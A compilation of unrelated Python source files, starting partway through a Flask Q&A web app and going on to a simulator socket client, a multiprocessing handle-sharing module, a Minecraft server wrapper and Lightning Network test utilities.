# end autobot
return flask.render_template('detail.html',question=question_model)
@app.route('/comment/',methods=['POST'])
@login_required
def comment():
question_id = flask.request.form.get('question_id')
content = flask.request.form.get('content')
answer_model = AnswerModel(content=content)
answer_model.author = flask.g.user
answer_model.question = QuestionModel.query.get(question_id)
db.session.add(answer_model)
db.session.commit()
return flask.redirect(flask.url_for('detail',id=question_id))
@app.route('/search/')
def search():
q = flask.request.args.get('q')
questions = QuestionModel.query.filter(or_(QuestionModel.title.contains(q),QuestionModel.content.contains(q)))
context = {
'questions': questions
}
return flask.render_template('index.html',**context)
@app.route('/login/',methods=['GET','POST'])
def login():
if flask.request.method == 'GET':
return flask.render_template('login.html')
else:
telephone = flask.request.form.get('telephone')
password = flask.request.form.get('password')
user = UserModel.query.filter_by(telephone=telephone).first()
if user and user.check_password(password):
flask.session['id'] = user.id
flask.g.user = user
return flask.redirect(flask.url_for('index'))
else:
return u'用户名或密码错误!'
@app.route('/logout/',methods=['GET'])
def logout():
flask.session.clear()
return flask.redirect(flask.url_for('login'))
@app.route('/regist/',methods=['GET','POST'])
def regist():
if flask.request.method == 'GET':
return flask.render_template('regist.html')
else:
form = RegistForm(flask.request.form)
if form.validate():
telephone = form.telephone.data
username = form.username.data
password = form.password1.data
user = UserModel(telephone=telephone,username=username,password=password)
db.session.add(user)
db.session.commit()
return flask.redirect(flask.url_for('login'))
@app.before_request
def before_request():
id = flask.session.get('id')
if id:
user = UserModel.query.get(id)
flask.g.user = user
@app.context_processor
def context_processor():
if hasattr(flask.g,'user'):
return {"user":flask.g.user}
else:
return {}
if __name__ == '__main__':
app.run(port=9000)
|
client.py
|
"""
SDClient
A base class for interacting with the sdsim simulator as a server.
The server will create one vehicle per client connection. The client
will then interact by creating json messages to send to the server.
The server will reply with telemetry and other status messages in an
asynchronous manner.
Author: Tawn Kramer
"""
import json
import logging
import select
import socket
import time
from threading import Thread
from .util import replace_float_notation
logger = logging.getLogger(__name__)
class SDClient:
def __init__(self, host, port, poll_socket_sleep_time=0.05):
self.msg = None
self.host = host
self.port = port
self.poll_socket_sleep_sec = poll_socket_sleep_time
self.th = None
# the aborted flag will be set when we have detected a problem with the socket
# that we can't recover from.
self.aborted = False
self.connect()
def connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connecting to the server
logger.info("connecting to %s:%d " % (self.host, self.port))
try:
self.s.connect((self.host, self.port))
except ConnectionRefusedError:
raise (
Exception(
"Could not connect to server. Is it running? "
"If you specified 'remote', then you must start it manually."
)
)
# time.sleep(pause_on_create)
self.do_process_msgs = True
self.th = Thread(target=self.proc_msg, args=(self.s,), daemon=True)
self.th.start()
def send(self, m):
self.msg = m
def send_now(self, msg):
logger.debug("send_now:" + msg)
self.s.sendall(msg.encode("utf-8"))
def on_msg_recv(self, j):
logger.debug("got:" + j["msg_type"])
def stop(self):
# signal proc_msg loop to stop, then wait for thread to finish
# close socket
self.do_process_msgs = False
if self.th is not None:
self.th.join()
if self.s is not None:
self.s.close()
def proc_msg(self, sock): # noqa: C901
"""
This is the thread message loop to process messages.
We will send any message that is queued via the self.msg variable
when our socket is in a writable state.
And we will read any messages when it's in a readable state and then
call self.on_msg_recv with the json object message.
"""
sock.setblocking(0)
inputs = [sock]
outputs = [sock]
localbuffer = ""
while self.do_process_msgs:
# without this sleep, I was getting very consistent socket errors
# on Windows. Perhaps we don't need this sleep on other platforms.
time.sleep(self.poll_socket_sleep_sec)
try:
# test our socket for readable, writable states.
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
try:
data = s.recv(1024 * 256)
except ConnectionAbortedError:
                        logger.warning("socket connection aborted")
print("socket connection aborted")
self.do_process_msgs = False
break
# we don't technically need to convert from bytes to string
# for json.loads, but we do need a string in order to do
                    # the split by \n newline char. This separates each json msg.
data = data.decode("utf-8")
localbuffer += data
n0 = localbuffer.find("{")
n1 = localbuffer.rfind("}\n")
if n1 >= 0 and 0 <= n0 < n1: # there is at least one message :
msgs = localbuffer[n0 : n1 + 1].split("\n")
localbuffer = localbuffer[n1:]
for m in msgs:
if len(m) <= 2:
continue
# Replace comma with dots for floats
# useful when using unity in a language different from English
m = replace_float_notation(m)
try:
j = json.loads(m)
except Exception as e:
logger.error("Exception:" + str(e))
logger.error("json: " + m)
continue
if "msg_type" not in j:
logger.error("Warning expected msg_type field")
logger.error("json: " + m)
continue
else:
self.on_msg_recv(j)
for s in writable:
if self.msg is not None:
logger.debug("sending " + self.msg)
s.sendall(self.msg.encode("utf-8"))
self.msg = None
if len(exceptional) > 0:
logger.error("problems w sockets!")
except Exception as e:
print("Exception:", e)
self.aborted = True
self.on_msg_recv({"msg_type": "aborted"})
break
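# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the original
# client). The host/port below are assumptions; point them at a running sdsim
# server. Because of the relative import above, run this as a module
# (python -m <package>.client) rather than as a plain script.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    client = SDClient("127.0.0.1", 9091)
    # proc_msg() is already running in a background thread; give it a moment
    # to receive any telemetry, then shut down cleanly.
    time.sleep(2.0)
    client.stop()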
|
reduction.py
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = ['reduce_socket', 'reduce_connection', 'send_handle', 'recv_handle']
import os
import sys
import socket
import threading
import struct
import signal
from multiprocess import current_process
from multiprocess.util import register_after_fork, debug, sub_debug
from multiprocess.util import is_exiting, sub_warning
#
#
#
if not(sys.platform == 'win32' or (hasattr(socket, 'CMSG_LEN') and
hasattr(socket, 'SCM_RIGHTS'))):
raise ImportError('pickling of connections not supported')
#
# Platform specific definitions
#
if sys.platform == 'win32':
# Windows
__all__ += ['reduce_pipe_connection']
import _winapi
def send_handle(conn, handle, destination_pid):
dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid)
conn.send(dh)
def recv_handle(conn):
return conn.recv().detach()
class DupHandle(object):
def __init__(self, handle, access, pid=None):
# duplicate handle for process with given pid
if pid is None:
pid = os.getpid()
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid)
try:
self._handle = _winapi.DuplicateHandle(
_winapi.GetCurrentProcess(),
handle, proc, access, False, 0)
finally:
_winapi.CloseHandle(proc)
self._access = access
self._pid = pid
def detach(self):
# retrieve handle from process which currently owns it
if self._pid == os.getpid():
return self._handle
proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False,
self._pid)
try:
return _winapi.DuplicateHandle(
proc, self._handle, _winapi.GetCurrentProcess(),
self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE)
finally:
_winapi.CloseHandle(proc)
class DupSocket(object):
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = resource_sharer.register(send, new_sock.close)
def detach(self):
conn = resource_sharer.get_connection(self._id)
try:
share = conn.recv_bytes()
return socket.fromshare(share)
finally:
conn.close()
def reduce_socket(s):
return rebuild_socket, (DupSocket(s),)
def rebuild_socket(ds):
return ds.detach()
def reduce_connection(conn):
handle = conn.fileno()
with socket.fromfd(handle, socket.AF_INET, socket.SOCK_STREAM) as s:
ds = DupSocket(s)
return rebuild_connection, (ds, conn.readable, conn.writable)
def rebuild_connection(ds, readable, writable):
from .connection import Connection
sock = ds.detach()
return Connection(sock.detach(), readable, writable)
def reduce_pipe_connection(conn):
access = ((_winapi.FILE_GENERIC_READ if conn.readable else 0) |
(_winapi.FILE_GENERIC_WRITE if conn.writable else 0))
dh = DupHandle(conn.fileno(), access)
return rebuild_pipe_connection, (dh, conn.readable, conn.writable)
def rebuild_pipe_connection(dh, readable, writable):
from .connection import PipeConnection
handle = dh.detach()
return PipeConnection(handle, readable, writable)
else:
# Unix
# On MacOSX we should acknowledge receipt of fds -- see Issue14669
ACKNOWLEDGE = sys.platform == 'darwin'
def send_handle(conn, handle, destination_pid):
with socket.fromfd(conn.fileno(), socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
struct.pack("@i", handle))])
if ACKNOWLEDGE and conn.recv_bytes() != b'ACK':
raise RuntimeError('did not receive acknowledgement of fd')
def recv_handle(conn):
size = struct.calcsize("@i")
with socket.fromfd(conn.fileno(), socket.AF_UNIX, socket.SOCK_STREAM) as s:
msg, ancdata, flags, addr = s.recvmsg(1, socket.CMSG_LEN(size))
try:
if ACKNOWLEDGE:
conn.send_bytes(b'ACK')
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
return struct.unpack("@i", cmsg_data[:size])[0]
except (ValueError, IndexError, struct.error):
pass
raise RuntimeError('Invalid data received')
class DupFd(object):
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = resource_sharer.register(send, close)
def detach(self):
conn = resource_sharer.get_connection(self._id)
try:
return recv_handle(conn)
finally:
conn.close()
def reduce_socket(s):
df = DupFd(s.fileno())
return rebuild_socket, (df, s.family, s.type, s.proto)
def rebuild_socket(df, family, type, proto):
fd = df.detach()
s = socket.fromfd(fd, family, type, proto)
os.close(fd)
return s
def reduce_connection(conn):
df = DupFd(conn.fileno())
return rebuild_connection, (df, conn.readable, conn.writable)
def rebuild_connection(df, readable, writable):
from .connection import Connection
fd = df.detach()
return Connection(fd, readable, writable)
#
# Server which shares registered resources with clients
#
class ResourceSharer(object):
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
register_after_fork(self, ResourceSharer._afterfork)
def register(self, send, close):
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
from .connection import Client
address, key = ident
c = Client(address, authkey=current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address, authkey=current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
                    sub_warning('ResourceSharer thread did not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None
debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
conn = self._listener.accept()
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
send(conn, destination_pid)
close()
conn.close()
except:
if not is_exiting():
import traceback
sub_warning(
'thread for sharing handles raised exception :\n' +
'-'*79 + '\n' + traceback.format_exc() + '-'*79
)
resource_sharer = ResourceSharer()
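# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor's addition, not part of the original
# module): hand an open file descriptor to a child process with the
# send_handle()/recv_handle() pair defined above. Assumes a Unix platform
# using the default fork start method.
# ---------------------------------------------------------------------------
def _demo_child(conn):
    # Receive the duplicated descriptor and read from it.
    fd = recv_handle(conn)
    with os.fdopen(fd, 'rb') as f:
        print(f.read())

if __name__ == '__main__':
    import tempfile
    from multiprocess import Pipe, Process
    parent_conn, child_conn = Pipe()
    child = Process(target=_demo_child, args=(child_conn,))
    child.start()
    with tempfile.TemporaryFile() as f:
        f.write(b'hello from the parent\n')
        f.seek(0)
        send_handle(parent_conn, f.fileno(), child.pid)
        child.join()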
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello, I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
server.py
|
import subprocess
import threading
from os import system
from time import sleep
# Open a new process running bedrock_server.exe, piping its input and output here
process = subprocess.Popen('bedrock_server.exe', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Allows for input from the console
def input_loop():
while True:
inp = input() + "\n"
process.stdin.write(inp.encode())
process.stdin.flush()
# Output from bedrock_server.exe
def output_loop():
while True:
for line in process.stdout:
clean_line = line.decode("utf-8").rstrip("\n")
print(clean_line)
with open("log.txt", "a+") as log_file:
                log_file.write(clean_line + "\n")
# Backing up loop
def backup_loop():
while True:
to_type = "save hold\n"
process.stdin.write(to_type.encode())
process.stdin.flush()
sleep(10)
system("backup.bat")
sleep(.75)
to_type = "save resume\n"
process.stdin.write(to_type.encode())
process.stdin.flush()
sleep(21600) # That's 6 hours
# Start the threads
_input = threading.Thread(target=input_loop)
_output = threading.Thread(target=output_loop)
_backup = threading.Thread(target=backup_loop)
_output.start()
_input.start()
sleep(15)
_backup.start()
|
threadDemo.py
|
#! python3
# threadDemo.py
import time
import threading
print('Start of program.')
def takeANap():
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of program.')
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
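# The module-level flags below are themselves examples of env() in use: each one
# falls back from the environment, to config.vars, to the literal default given.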
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
                self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
    # wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
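    # Example (illustrative): after broadcasting a transaction with id `txid`,
    # `bitcoind.generate_block(6, wait_for_mempool=txid)` waits for it to show
    # up in the mempool before mining six blocks on top of it.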
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that tx's that become invalid at [height] (because of coin maturity, locktime,
        etc.) are removed from the mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
